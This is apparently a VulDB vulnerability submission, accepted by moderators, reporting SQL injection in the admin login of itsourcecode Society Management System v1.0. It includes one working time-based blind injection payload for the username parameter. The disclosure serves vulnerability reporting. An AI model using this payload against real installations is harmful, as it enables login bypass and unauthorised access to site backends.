Submit #380384: itsourcecode Society Management System v1.0 SQLi check_admin.phpinfo

Titleitsourcecode Society Management System v1.0 SQLi check_admin.php
DescriptionThere is an SQL injection vulnerability on the /admin/check_admin.php page, allowing attackers to bypass the password and directly access the website's backend using a universal password. --- Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 9121 FROM (SELECT(SLEEP(5)))lIaJ) AND 'oHbk'='oHbk&password=ad --- Download Source Code: https://itsourcecode.com/wp-content/uploads/2021/04/Society-Management-System-Project-In-PHP-Free-Download-Source-Code.zip
Source⚠️ https://github.com/DeepMountains/Mirage/blob/main/CVE7-2.md
User
 Dee.Mirage (ID 71702)
Submission07/26/2024 03:07 AM (3 months ago)
Moderation07/28/2024 09:39 PM (3 days later)
StatusAccepted
VulDB Entry272616
Points20